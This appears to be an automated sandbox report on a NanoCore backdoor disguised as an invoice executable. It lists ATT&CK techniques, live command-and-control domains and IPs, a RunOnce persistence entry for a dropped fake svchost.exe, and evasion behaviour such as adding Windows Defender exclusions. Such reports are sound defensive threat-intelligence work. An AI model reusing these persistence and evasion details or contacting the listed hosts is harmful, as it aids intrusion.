        Domain AccountsCommand and Scripting Interpreter1Windows Service1Application Shimming1Obfuscated Files or Information2Security Account ManagerQuery Registry1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsService Execution2Registry Run Keys / Startup Folder1Access Token Manipulation1Timestomp1NTDSSecurity Software Discovery341Distributed Component Object ModelInput CaptureScheduled TransferRemote Access Software1SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptWindows Service1DLL Side-Loading1LSA SecretsVirtualization/Sandbox Evasion25SSHKeyloggingData Transfer Size LimitsNon-Application Layer Protocol2Manipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonProcess Injection311Masquerading111Cached Domain CredentialsProcess Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelApplication Layer Protocol2Jamming or Denial of ServiceAbuse Accessibility Features
        External Remote ServicesScheduled TaskStartup ItemsRegistry Run Keys / Startup Folder1Virtualization/Sandbox Evasion25DCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobAccess Token Manipulation1Proc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
        Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Process Injection311/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
        Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Hidden Files and Directories1Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 signatures2 2 Behavior Graph ID: 355838 Sample: CN-Invoice-XXXXX9808-190111... Startdate: 22/02/2021 Architecture: WINDOWS Score: 100 79 Malicious sample detected (through community Yara rule) 2->79 81 Multi AV Scanner detection for submitted file 2->81 83 Sigma detected: NanoCore 2->83 85 12 other signatures 2->85 8 CN-Invoice-XXXXX9808-19011143287990.exe 23 9 2->8         started        13 explorer.exe 2->13         started        15 explorer.exe 2->15         started        17 11 other processes 2->17 process3 dnsIp4 75 coroloboxorozor.com 104.21.71.230, 49715, 49723, 49726 CLOUDFLARENETUS United States 8->75 59 C:\Users\Public\Documents\...\svchost.exe, PE32 8->59 dropped 61 C:\Users\...\svchost.exe:Zone.Identifier, ASCII 8->61 dropped 63 C:\Users\user\AppData\...\AdvancedRun.exe, PE32 8->63 dropped 103 Writes to foreign memory regions 8->103 105 Adds a directory exclusion to Windows Defender 8->105 107 Hides threads from debuggers 8->107 111 3 other signatures 8->111 19 CasPol.exe 8->19         started        24 AdvancedRun.exe 1 8->24         started        26 cmd.exe 8->26         started        34 3 other processes 8->34 28 svchost.exe 13->28         started        30 svchost.exe 15->30         started        77 127.0.0.1 unknown unknown 17->77 109 Changes security center settings (notifications, updates, antivirus, firewall) 17->109 32 WerFault.exe 17->32         started        file5 signatures6 process7 dnsIp8 65 nanopc.linkpc.net 185.192.70.170, 50005 UKSERVERS-ASUKDedicatedServersHostingandCo-Location Netherlands 19->65 67 185.157.161.86, 49739, 50005 OBE-EUROPEObenetworkEuropeSE Sweden 19->67 53 C:\Users\user\AppData\Roaming\...\run.dat, data 19->53 dropped 87 Hides that the sample has been downloaded from the Internet (zone.identifier) 19->87 36 AdvancedRun.exe 24->36         started        39 conhost.exe 26->39         started        41 timeout.exe 26->41         started        69 coroloboxorozor.com 28->69 55 C:\Users\user\AppData\...\AdvancedRun.exe, PE32 28->55 dropped 89 Multi AV Scanner detection for dropped file 28->89 91 Machine Learning detection for dropped file 28->91 93 Adds a directory exclusion to Windows Defender 28->93 95 Tries to delay execution (extensive OutputDebugStringW loop) 28->95 43 powershell.exe 28->43         started        45 AdvancedRun.exe 28->45         started        71 coroloboxorozor.com 30->71 57 C:\Users\user\AppData\...\AdvancedRun.exe, PE32 30->57 dropped 97 System process connects to network (likely due to code injection or exploit) 30->97 99 Hides threads from debuggers 30->99 101 Injects a PE file into a foreign processes 30->101 47 conhost.exe 34->47         started        49 conhost.exe 34->49         started        file9 signatures10 process11 dnsIp12 73 192.168.2.1 unknown unknown 36->73 51 conhost.exe 43->51         started        process13

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.

        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        CN-Invoice-XXXXX9808-19011143287990.exe26%ReversingLabsByteCode-MSIL.Backdoor.NanoBot
        CN-Invoice-XXXXX9808-19011143287990.exe100%Joe Sandbox ML

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe100%Joe Sandbox ML
        C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe26%ReversingLabsByteCode-MSIL.Backdoor.NanoBot
        C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exe3%MetadefenderBrowse
        C:\Users\user\AppData\Local\Temp\1481353f-436c-4b98-9136-3fbe69a7e8b4\AdvancedRun.exe0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\1cc51949-2752-4134-b6cf-961241419db1\AdvancedRun.exe3%MetadefenderBrowse
        C:\Users\user\AppData\Local\Temp\1cc51949-2752-4134-b6cf-961241419db1\AdvancedRun.exe0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\aae7ea5f-d28c-4ac0-af33-beecd9bd44c7\AdvancedRun.exe3%MetadefenderBrowse
        C:\Users\user\AppData\Local\Temp\aae7ea5f-d28c-4ac0-af33-beecd9bd44c7\AdvancedRun.exe0%ReversingLabs

        Unpacked PE Files

        No Antivirus matches

        Domains

        SourceDetectionScannerLabelLink
        coroloboxorozor.com0%VirustotalBrowse

        URLs

        SourceDetectionScannerLabelLink
        http://coroloboxorozor.com/base/95912DAC735F7FBEA8150232E35CAF73.html0%VirustotalBrowse
        http://coroloboxorozor.com/base/95912DAC735F7FBEA8150232E35CAF73.html0%Avira URL Cloudsafe
        http://ocsp.sectigo.com00%URL Reputationsafe
        http://ocsp.sectigo.com00%URL Reputationsafe
        http://ocsp.sectigo.com00%URL Reputationsafe
        http://ocsp.sectigo.com00%URL Reputationsafe
        http://coroloboxorozor.com0%VirustotalBrowse
        http://coroloboxorozor.com0%Avira URL Cloudsafe
        http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#0%URL Reputationsafe
        http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#0%URL Reputationsafe
        http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#0%URL Reputationsafe
        http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#0%URL Reputationsafe
        https://sectigo.com/CPS0C0%URL Reputationsafe
        https://sectigo.com/CPS0C0%URL Reputationsafe
        https://sectigo.com/CPS0C0%URL Reputationsafe
        https://sectigo.com/CPS0C0%URL Reputationsafe
        https://sectigo.com/CPS0D0%URL Reputationsafe
        https://sectigo.com/CPS0D0%URL Reputationsafe
        https://sectigo.com/CPS0D0%URL Reputationsafe
        https://sectigo.com/CPS0D0%URL Reputationsafe
        http://coroloboxorozor.com/base/751448401274A413C5FF91CCBC4EFF60.html0%Avira URL Cloudsafe
        http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%URL Reputationsafe
        http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%URL Reputationsafe
        http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%URL Reputationsafe
        http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
        http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
        http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
        https://dynamic.t0%URL Reputationsafe
        https://dynamic.t0%URL Reputationsafe
        https://dynamic.t0%URL Reputationsafe
        http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
        http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
        http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
        http://coroloboxorozor.com/base/84D1B49C9212CA5D522F0AF86A906727.html0%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        nanopc.linkpc.net
        		185.192.70.170
        		truefalse
          		high
          coroloboxorozor.com
          		104.21.71.230
          		truetrueunknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          http://coroloboxorozor.com/base/95912DAC735F7FBEA8150232E35CAF73.htmltrue
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          http://coroloboxorozor.com/base/751448401274A413C5FF91CCBC4EFF60.htmltrue
          • Avira URL Cloud: safe
          		unknown
          http://coroloboxorozor.com/base/84D1B49C9212CA5D522F0AF86A906727.htmltrue
          • Avira URL Cloud: safe
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005WerFault.exe, 0000001E.00000003.345409871.00000000059E0000.00000004.00000001.sdmpfalse
            		high
            http://ocsp.sectigo.com0CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.519819343.0000000003659000.00000004.00000001.sdmp, AdvancedRun.exe.22.drfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            		unknown
            https://dev.ditu.live.com/REST/v1/Routes/svchost.exe, 00000012.00000002.312247860.000001F77323D000.00000004.00000001.sdmpfalse
              		high
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200WerFault.exe, 0000001E.00000003.345409871.00000000059E0000.00000004.00000001.sdmpfalse
                		high
                https://dev.virtualearth.net/REST/v1/Routes/Drivingsvchost.exe, 00000012.00000003.310473925.000001F773260000.00000004.00000001.sdmpfalse
                  		high
                  https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashxsvchost.exe, 00000012.00000002.312247860.000001F77323D000.00000004.00000001.sdmpfalse
                    		high
                    https://t0.tiles.ditu.live.com/tiles/gensvchost.exe, 00000012.00000002.312327948.000001F77324F000.00000004.00000001.sdmpfalse
                      		high
                      https://dev.virtualearth.net/REST/v1/Routes/Walkingsvchost.exe, 00000012.00000003.310473925.000001F773260000.00000004.00000001.sdmpfalse
                        		high
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovinceWerFault.exe, 0000001E.00000003.345409871.00000000059E0000.00000004.00000001.sdmpfalse
                          		high
                          http://coroloboxorozor.comCN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.471272964.0000000002471000.00000004.00000001.sdmpfalse
                          • 0%, Virustotal, Browse
                          • Avira URL Cloud: safe
                          		unknown
                          https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=svchost.exe, 00000012.00000003.310849812.000001F773241000.00000004.00000001.sdmpfalse
                            		high
                            http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.519819343.0000000003659000.00000004.00000001.sdmp, AdvancedRun.exe.22.drfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20WerFault.exe, 0000001E.00000003.345409871.00000000059E0000.00000004.00000001.sdmpfalse
                              		high
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authenticationWerFault.exe, 0000001E.00000003.345409871.00000000059E0000.00000004.00000001.sdmpfalse
                                		high
                                https://dev.ditu.live.com/mapcontrol/logging.ashxsvchost.exe, 00000012.00000003.310473925.000001F773260000.00000004.00000001.sdmpfalse
                                  		high
                                  https://dev.ditu.live.com/REST/v1/Imagery/Copyright/svchost.exe, 00000012.00000003.310574824.000001F77325D000.00000004.00000001.sdmpfalse
                                    		high
                                    https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=svchost.exe, 00000012.00000003.310709236.000001F773240000.00000004.00000001.sdmpfalse
                                      		high
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamejhttp://schemas.xmlsoap.oWerFault.exe, 0000001E.00000003.345409871.00000000059E0000.00000004.00000001.sdmpfalse
                                        		high
                                        https://dev.virtualearth.net/REST/v1/Transit/Schedules/svchost.exe, 00000012.00000003.310849812.000001F773241000.00000004.00000001.sdmpfalse
                                          		high
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidWerFault.exe, 0000001E.00000003.345409871.00000000059E0000.00000004.00000001.sdmpfalse
                                            		high
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.oWerFault.exe, 0000001E.00000003.345409871.00000000059E0000.00000004.00000001.sdmpfalse
                                              		high
                                              https://sectigo.com/CPS0CCN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.519819343.0000000003659000.00000004.00000001.sdmp, AdvancedRun.exe.22.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              https://sectigo.com/CPS0DCN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.519819343.0000000003659000.00000004.00000001.sdmp, AdvancedRun.exe.22.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              https://appexmapsappupdate.blob.core.windows.netsvchost.exe, 00000012.00000003.310473925.000001F773260000.00000004.00000001.sdmpfalse
                                                		high
                                                http://www.nirsoft.net/AdvancedRun.exe, AdvancedRun.exe, 00000009.00000002.271092950.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000027.00000000.419368466.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe.22.drfalse
                                                  		high
                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameCN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.471272964.0000000002471000.00000004.00000001.sdmp, WerFault.exe, 0000001E.00000003.345409871.00000000059E0000.00000004.00000001.sdmpfalse
                                                    		high
                                                    http://www.bingmapsportal.comsvchost.exe, 00000012.00000002.312067468.000001F773213000.00000004.00000001.sdmpfalse
                                                      		high
                                                      https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 00000012.00000002.312247860.000001F77323D000.00000004.00000001.sdmpfalse
                                                        		high
                                                        https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashxsvchost.exe, 00000012.00000003.310473925.000001F773260000.00000004.00000001.sdmpfalse
                                                          		high
                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifierWerFault.exe, 0000001E.00000003.345409871.00000000059E0000.00000004.00000001.sdmpfalse
                                                            		high
                                                            https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=svchost.exe, 00000012.00000003.310807979.000001F773244000.00000004.00000001.sdmpfalse
                                                              		high
                                                              https://dev.virtualearth.net/REST/v1/Routes/svchost.exe, 00000012.00000002.312247860.000001F77323D000.00000004.00000001.sdmpfalse
                                                                		high
                                                                https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=svchost.exe, 00000012.00000003.310807979.000001F773244000.00000004.00000001.sdmpfalse
                                                                  		high
                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphoneWerFault.exe, 0000001E.00000003.345409871.00000000059E0000.00000004.00000001.sdmpfalse
                                                                    		high
                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephoneWerFault.exe, 0000001E.00000003.345409871.00000000059E0000.00000004.00000001.sdmpfalse
                                                                      		high
                                                                      https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?svchost.exe, 00000012.00000002.312356651.000001F77325A000.00000004.00000001.sdmpfalse
                                                                        		high
                                                                        http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0sCN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.519819343.0000000003659000.00000004.00000001.sdmp, AdvancedRun.exe.22.drfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=svchost.exe, 00000012.00000002.312247860.000001F77323D000.00000004.00000001.sdmp, svchost.exe, 00000012.00000002.312067468.000001F773213000.00000004.00000001.sdmpfalse
                                                                          		high
                                                                          https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 00000012.00000002.312327948.000001F77324F000.00000004.00000001.sdmpfalse
                                                                            		high
                                                                            https://dev.virtualearth.net/REST/v1/Locationssvchost.exe, 00000012.00000003.310473925.000001F773260000.00000004.00000001.sdmpfalse
                                                                              		high
                                                                              https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 00000012.00000003.288221774.000001F773232000.00000004.00000001.sdmpfalse
                                                                                		high
                                                                                https://dev.virtualearth.net/mapcontrol/logging.ashxsvchost.exe, 00000012.00000003.310473925.000001F773260000.00000004.00000001.sdmpfalse
                                                                                  		high
                                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/WerFault.exe, 0000001E.00000003.345409871.00000000059E0000.00000004.00000001.sdmpfalse
                                                                                    		high
                                                                                    http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tCN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.519819343.0000000003659000.00000004.00000001.sdmp, AdvancedRun.exe.22.drfalse
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=svchost.exe, 00000012.00000002.312356651.000001F77325A000.00000004.00000001.sdmpfalse
                                                                                      		high
                                                                                      https://dynamic.tsvchost.exe, 00000012.00000002.312327948.000001F77324F000.00000004.00000001.sdmp, svchost.exe, 00000012.00000003.310849812.000001F773241000.00000004.00000001.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#CN-Invoice-XXXXX9808-19011143287990.exe, 00000000.00000002.519819343.0000000003659000.00000004.00000001.sdmp, AdvancedRun.exe.22.drfalse
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      https://dev.virtualearth.net/REST/v1/Routes/Transitsvchost.exe, 00000012.00000003.310473925.000001F773260000.00000004.00000001.sdmpfalse
                                                                                        		high
                                                                                        https://t0.ssl.ak.tiles.virtualearth.net/tiles/gensvchost.exe, 00000012.00000003.310807979.000001F773244000.00000004.00000001.sdmpfalse
                                                                                          		high
                                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/WerFault.exe, 0000001E.00000003.345409871.00000000059E0000.00000004.00000001.sdmpfalse
                                                                                            		high
                                                                                            https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=svchost.exe, 00000012.00000002.312356651.000001F77325A000.00000004.00000001.sdmpfalse
                                                                                              		high
                                                                                              https://dev.ditu.live.com/REST/v1/Locationssvchost.exe, 00000012.00000003.310473925.000001F773260000.00000004.00000001.sdmpfalse
                                                                                                		high
                                                                                                https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=svchost.exe, 00000012.00000003.310574824.000001F77325D000.00000004.00000001.sdmpfalse
                                                                                                  		high

                                                                                                  Contacted IPs

                                                                                                  • No. of IPs < 25%
                                                                                                  • 25% < No. of IPs < 50%
                                                                                                  • 50% < No. of IPs < 75%
                                                                                                  • 75% < No. of IPs

                                                                                                  Public

                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                  104.21.71.230
                                                                                                  		unknownUnited States
                                                                                                  		13335CLOUDFLARENETUStrue
                                                                                                  185.157.161.86
                                                                                                  		unknownSweden
                                                                                                  		197595OBE-EUROPEObenetworkEuropeSEfalse
                                                                                                  185.192.70.170
                                                                                                  		unknownNetherlands
                                                                                                  		42831UKSERVERS-ASUKDedicatedServersHostingandCo-Locationfalse

                                                                                                  Private

                                                                                                  IP
                                                                                                  192.168.2.1
                                                                                                  127.0.0.1

                                                                                                  General Information

                                                                                                  Joe Sandbox Version:31.0.0 Emerald
                                                                                                  Analysis ID:355838
                                                                                                  Start date:22.02.2021
                                                                                                  Start time:07:44:22
                                                                                                  Joe Sandbox Product:CloudBasic
                                                                                                  Overall analysis duration:0h 13m 18s
                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                  Report type:full
                                                                                                  Sample file name:CN-Invoice-XXXXX9808-19011143287990.exe
                                                                                                  Cookbook file name:default.jbs
                                                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                  Number of analysed new started processes analysed:40
                                                                                                  Number of new started drivers analysed:0
                                                                                                  Number of existing processes analysed:0
                                                                                                  Number of existing drivers analysed:0
                                                                                                  Number of injected processes analysed:0
                                                                                                  Technologies:
                                                                                                  • HCA enabled
                                                                                                  • EGA enabled
                                                                                                  • HDC enabled
                                                                                                  • AMSI enabled
                                                                                                  Analysis Mode:default
                                                                                                  Analysis stop reason:Timeout
                                                                                                  Detection:MAL
                                                                                                  Classification:mal100.troj.evad.winEXE@56/29@6/5
                                                                                                  EGA Information:Failed
                                                                                                  HDC Information:
                                                                                                  • Successful, ratio: 12.8% (good quality ratio 11.9%)
                                                                                                  • Quality average: 80.8%
                                                                                                  • Quality standard deviation: 28.7%
                                                                                                  HCA Information:
                                                                                                  • Successful, ratio: 86%
                                                                                                  • Number of executed functions: 83
                                                                                                  • Number of non-executed functions: 118
                                                                                                  Cookbook Comments:
                                                                                                  • Adjust boot time
                                                                                                  • Enable AMSI
                                                                                                  • Found application associated with file extension: .exe
                                                                                                  Warnings:
                                                                                                  Show All
                                                                                                  • Exclude process from analysis (whitelisted): taskhostw.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, WmiPrvSE.exe
                                                                                                  • Excluded IPs from analysis (whitelisted): 51.104.139.180, 204.79.197.200, 13.107.21.200, 93.184.220.29, 104.43.139.144, 92.122.145.220, 52.255.188.83, 92.122.144.200, 51.103.5.186, 51.11.168.160, 92.122.213.194, 92.122.213.247, 104.42.151.234, 20.54.26.129, 168.61.161.212
                                                                                                  • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, cs9.wac.phicdn.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, ocsp.digicert.com, www-bing-com.dual-a-0001.a-msedge.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, www.bing.com, client.wns.windows.com, fs.microsoft.com, dual-a-0001.a-msedge.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, skypedataprdcolcus17.cloudapp.net, skypedataprdcolcus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net
                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                  • Report size getting too big, too many NtSetInformationFile calls found.

                                                                                                  Simulations

                                                                                                  Behavior and APIs

                                                                                                  TimeTypeDescription
                                                                                                  07:45:27API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                                  07:45:30AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce fIvxwJDVdGdMfCgtYuXwXFIxLX explorer.exe "C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe"
                                                                                                  07:45:38AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce fIvxwJDVdGdMfCgtYuXwXFIxLX explorer.exe "C:\Users\Public\Documents\FaSHxnwjRFVyhBDRxvFVzLZ\svchost.exe"
                                                                                                  07:45:54API Interceptor41x Sleep call for process: powershell.exe modified
                                                                                                  07:46:43API Interceptor1x Sleep call for process: WerFault.exe modified

                                                                                                  Joe Sandbox View / Context

                                                                                                  IPs

                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                  104.21.71.230PurchaseOrdersCSTtyres004786587.exeGet hashmaliciousBrowse
                                                                                                  • coroloboxorozor.com/base/532020C7A3B820370CFAAC4888397C0C.html
                                                                                                  185.157.161.86CN-Invoice-XXXXX9808-19011143287990.exeGet hashmaliciousBrowse
                                                                                                    Order_List_PO# 081929.exeGet hashmaliciousBrowse
                                                                                                      order-1812896543124646450.exeGet hashmaliciousBrowse
                                                                                                        order-181289654312464649.exeGet hashmaliciousBrowse
                                                                                                          order-181289654312464648.exeGet hashmaliciousBrowse
                                                                                                            Order_1101201918_AUTECH.exeGet hashmaliciousBrowse
                                                                                                              50404868-c352-422f-a608-7fd64b335eec.exeGet hashmaliciousBrowse
                                                                                                                74725794.pdf.exeGet hashmaliciousBrowse
                                                                                                                  Order_List_PO# 0819289.exeGet hashmaliciousBrowse

                                                                                                                    Domains

                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                    coroloboxorozor.comINVOICE_47383.EXEGet hashmaliciousBrowse
                                                                                                                    • 172.67.172.17
                                                                                                                    PurchaseOrdersCSTtyres004786587.exeGet hashmaliciousBrowse
                                                                                                                    • 104.21.71.230
                                                                                                                    nanopc.linkpc.netCN-Invoice-XXXXX9808-19011143287990.exeGet hashmaliciousBrowse
                                                                                                                    • 185.157.161.86
                                                                                                                    Order_List_PO# 081929.exeGet hashmaliciousBrowse
                                                                                                                    • 185.157.161.86
                                                                                                                    order-1812896543124646450.exeGet hashmaliciousBrowse
                                                                                                                    • 185.157.161.86
                                                                                                                    order-181289654312464649.exeGet hashmaliciousBrowse
                                                                                                                    • 185.157.161.86
                                                                                                                    order-181289654312464648.exeGet hashmaliciousBrowse
                                                                                                                    • 185.157.161.86
                                                                                                                    ORDER PMX-PT-2001 STOCK+NOVO.exeGet hashmaliciousBrowse
                                                                                                                    • 185.157.162.81
                                                                                                                    DHL_10177_R293_DOCUMENT.exeGet hashmaliciousBrowse
                                                                                                                    • 105.112.101.201

                                                                                                                    ASN

                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                    CLOUDFLARENETUSSelected New Order.exeGet hashmaliciousBrowse
                                                                                                                    • 104.21.19.200
                                                                                                                    Unterlagen PDF.exeGet hashmaliciousBrowse
                                                                                                                    • 162.159.129.233
                                                                                                                    RFQ file_pdf.exeGet hashmaliciousBrowse
                                                                                                                    • 104.21.19.200
                                                                                                                    abominable.exeGet hashmaliciousBrowse
                                                                                                                    • 1.1.1.1
                                                                                                                    Copy_remittnce.exeGet hashmaliciousBrowse
                                                                                                                    • 162.159.130.233
                                                                                                                    uTorrent.exeGet hashmaliciousBrowse
                                                                                                                    • 104.18.88.101
                                                                                                                    uTorrent.exeGet hashmaliciousBrowse
                                                                                                                    • 104.18.88.101
                                                                                                                    Purchase order.exeGet hashmaliciousBrowse
                                                                                                                    • 23.227.38.74
                                                                                                                    SecuriteInfo.com.W32.AIDetectGBM.malware.02.16429.exeGet hashmaliciousBrowse
                                                                                                                    • 104.21.50.15
                                                                                                                    SecuriteInfo.com.Variant.Zusy.340597.28655.exeGet hashmaliciousBrowse
                                                                                                                    • 104.17.62.50
                                                                                                                    Order.exeGet hashmaliciousBrowse
                                                                                                                    • 104.21.19.200
                                                                                                                    purchase order.exeGet hashmaliciousBrowse
                                                                                                                    • 172.67.188.154
                                                                                                                    PURCHASE ORDER.exeGet hashmaliciousBrowse
                                                                                                                    • 172.67.188.154
